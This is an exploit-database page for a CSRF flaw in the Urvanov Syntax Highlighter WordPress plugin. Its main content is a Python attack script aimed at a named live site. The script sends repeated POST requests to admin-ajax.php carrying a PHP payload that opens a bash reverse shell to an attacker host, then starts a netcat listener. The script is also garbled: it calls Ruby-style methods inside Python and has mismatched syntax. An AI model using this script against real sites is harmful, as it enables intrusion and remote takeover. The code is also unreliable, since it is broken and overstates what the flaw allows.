Urvanov Syntax Highlighter <= 2.8.33 - Highlighting Blocks Mgt via CSRF

2023.10.27
ir E1.CODERS (IR) ir
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2023-45106
CWE: CWE-352
Dork: wp-admin/admin-ajax.php

import requests import os import time # The target URL where the Urvanov Syntax Highlighter plugin is installed url = 'http://www.adroom.ir/wp-admin/admin-ajax.php' # Your PHP shell payload payload = ''' <?php exec('/bin/bash -c \'bash -i >& /dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1\''); ?> ''' # Your attacker IP and port attacker_ip = 'ATTACKER_IP' attacker_port = ATTACKER_PORT headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36', 'Content-Type': 'application/x-www-form-urlencoded', 'X-Requested-With': 'XMLHttpRequest' } # Sending the exploit for i in range(1, 1000): data = { 'action': 'highlight_shortcode_editor_blocks', 'code': f'<pre>${i.to_s().rjust(4, "0")}.{payload}}</pre>' } response = requests.post(url, headers=headers, data=data) print(f'Attempt {i}: {response.text}') if response.text == 'ok': print(f'Shell uploaded at: {i.to_s().rjust(4, "0")}.php') break # Set up a listener on your attacker machine to catch the reverse shell os.system(f'nc -lvp {attacker_port}') source : https://www.sololearn.com/compiler-playground/cVoq838SsN5j

References:

https://wpscan.com/vulnerability/3e14d8c3-db58-43dc-bd87-20c5719d37da/


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top